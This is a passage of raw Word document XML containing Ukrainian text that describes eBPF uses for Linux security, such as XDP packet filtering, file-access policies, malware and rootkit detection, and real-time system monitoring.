        <w:t>за допомогою XDP можна фільтрувати пакети за IP-адресами або за типами трафіку, що дозволяє запобігти мережевим атакам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00901C8B" w:rsidP="000B0BB1">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3. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Контроль доступу до файлі</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">в (додаткові політики безпеки). </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>В умовах високої безпеки можна реалізувати додаткові політики контролю доступу до файлів або мережевих ресурсів, використовуючи eBPF. За допомогою BPF можна спостерігати за всіма операціями з файлами і заблокувати доступ до критичних файлів для підозрілих процесів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236344" w:rsidRDefault="00901C8B" w:rsidP="000B0BB1">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4. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Аналіз</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> та блокування шкідливого коду. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Завдяки можливості відслідковувати системні виклики та мережеві події, eBPF дозволяє виявляти </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">аномалії в поведінці </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Наприклад, можна виявити спроби впровадження шкідливого </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>оду</w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> або </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">несанкціоноване </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">звернення </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">до </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">певних </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ресурсів, </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">що </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="000B0BB1" w:rsidP="00236344">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">характерним для атак типу </w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>зловмисний код</w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> або </w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rootkit</w:t>
      </w:r>
      <w:r w:rsidR="00901C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00901C8B" w:rsidP="000B0BB1">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Переваги eBPF для безпеки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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Робота на рівні ядра.</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF дозволяє виконувати перевірку подій безпосередньо в ядрі, що робить його важким для обману або обходу зловмисниками.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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Мінімальні накладні витрати.</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>на eBPF працю</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> дуже швидко, тому </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>його</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> можна використовувати для моніторингу в реальному часі без значних накладних витрат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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Гнучкість.</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF дає змогу створювати дуже гнучкі фільтри для системних подій, що дозволяє створювати точні політики безпеки для конкретних типів атак.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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Ізоляція.</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> В умовах контейнеризації eBPF дозволяє ізолювати контейнери, забезпечуючи додатковий рівень захисту між ними та хостовою системою.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="007F018F" w:rsidP="000B0BB1">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7F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F163FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Моніторинг системи</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> є важливим аспектом для виявлення проблем з продуктивністю, а також для виявлення зловмисної активності або ненормальних поведінкових патернів. eBPF забезпечує потужні інструменти для моніторингу системних подій і дозволяє зібрати детальну інформацію про стан системи в реальному часі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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До о</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>сновн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>их</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрям</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ів</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> мон</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>іторингу з використанням eBPF можна віднести</w:t>
      </w:r>
      <w:r w:rsidR="007F018F" w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [5]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
